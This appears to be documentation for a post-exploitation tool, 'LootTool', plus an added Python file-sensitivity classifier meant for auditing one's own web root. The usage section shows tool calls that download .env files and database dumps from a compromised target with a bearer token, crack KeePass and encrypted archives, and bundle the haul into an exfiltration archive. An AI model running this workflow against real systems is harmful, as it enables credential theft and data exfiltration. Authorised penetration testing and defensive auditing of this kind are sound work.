LootTool — Loot Collection
LootTool automates post-exploitation loot collection: downloading exposed files, cracking encrypted artifacts, classifying sensitivity, and building exfiltration archives.
Actions
| Action | Purpose |
|---|---|
| collect | Download files from target using URLs |
| crack | Attempt to crack encrypted files (KeePass, etc.) |
| classify | Classify file sensitivity |
| archive | Create tar.gz of all collected loot |
| report | Generate loot inventory report |
Sensitivity Levels
| Level | Label | Examples |
|---|---|---|
| 0 | public | Publicly available information |
| 1 | internal | Internal documentation, non-sensitive |
| 2 | confidential | Business data, internal communications |
| 3 | restricted | PII, credentials, financial data |
| 4 | top-secret | Encryption keys, root access, crown jewels |
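
The scale above can also be applied to files found exposed during an audit of your own web root, so that findings are reported in remediation order. The sketch below is an added example, not LootTool's own code: the rule patterns, the `classify` and `inventory` helpers and the sample file contents are assumptions constructed for illustration; only the level numbers and labels come from the table.

```python
import re

# Level numbers and labels copied from the Sensitivity Levels table.
LABELS = {0: "public", 1: "internal", 2: "confidential", 3: "restricted", 4: "top-secret"}

# Assumed heuristics (not LootTool's rules): (level, reason, pattern over raw bytes).
RULES = [
    (4, "private key block", re.compile(rb"-----BEGIN (?:[A-Z]+ )*PRIVATE KEY-----")),
    (3, "credential assignment", re.compile(
        rb"(?im)^\s*[\w.]*(?:password|passwd|secret|api_?key|token)[\w.]*\s*[=:]\s*\S+")),
    (3, "US SSN-like number", re.compile(rb"\b\d{3}-\d{2}-\d{4}\b")),
    (3, "SQL dump of a user table", re.compile(
        rb'(?i)insert\s+into\s+[`"]?(?:users?|accounts?|customers?)\b')),
    (2, "confidentiality marking", re.compile(rb"(?i)\bconfidential\b")),
    (1, "internal-use marking", re.compile(rb"(?i)\binternal use only\b")),
]

def classify(data: bytes):
    """Return (level, label, reasons); the highest matching level wins."""
    hits = [(lvl, why) for lvl, why, pat in RULES if pat.search(data)]
    level = max((lvl for lvl, _ in hits), default=0)
    # An empty reasons list means no rule matched, not that the file is verified public.
    return level, LABELS[level], [why for lvl, why in hits if lvl == level]

# Constructed sample contents; none of these are real secrets.
SAMPLES = {
    ".env": b"APP_ENV=production\nDB_PASSWORD=example-not-real\n",
    "database.sql": b"INSERT INTO `users` (id, email) VALUES (1, 'a@example.com');\n",
    "deploy_key": b"-----BEGIN OPENSSH PRIVATE KEY-----\n(placeholder)\n",
    "handbook.txt": b"Internal use only. Office hours and parking rules.\n",
    "robots.txt": b"User-agent: *\nDisallow: /admin\n",
}

def inventory(files):
    """Rows of (name, level, label, reasons), most sensitive first."""
    rows = [(name, *classify(data)) for name, data in files.items()]
    return sorted(rows, key=lambda r: (-r[1], r[0]))

if __name__ == "__main__":
    for name, level, label, reasons in inventory(SAMPLES):
        why = ", ".join(reasons) or "no rule matched; review manually"
        print(f"{level} {label:<12} {name:<14} {why}")
```

Pattern matching of this kind under-classifies anything it has no rule for, so files that fall through to level 0 still need a manual look before they are reported as public.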
Usage
Collecting files
```
LootTool(
    action="collect",
    target="http://target.com",
    urls=[
        "http://target.com/.env",
        "http://target.com/backup/database.sql"
    ],
    authToken="Bearer eyJ..."
)
```

Cracking encrypted files

```
LootTool(
    action="crack",
    files=[
        {"path": "./loot/keepass.kdbx", "type": "keepass"},
        {"path": "./loot/encrypted.zip", "type": "encrypted"}
    ]
)
```

Classifying files

```
LootTool(
    action="classify",
    files=[
        {"path": "./loot/.env", "type": "text"},
        {"path": "./loot/database.sql", "type": "sql"}
    ]
)
```

Creating exfiltration archive

```
LootTool(action="archive")
```

Generating loot report

```
LootTool(action="report")
```

Loot Flow
- Collect — Download accessible files from the compromised target
- Crack — Break any encrypted files discovered
- Classify — Assign sensitivity levels to every file
- Archive — Bundle into a tar.gz for proof-of-impact
- Report — Generate inventory with sensitivity classification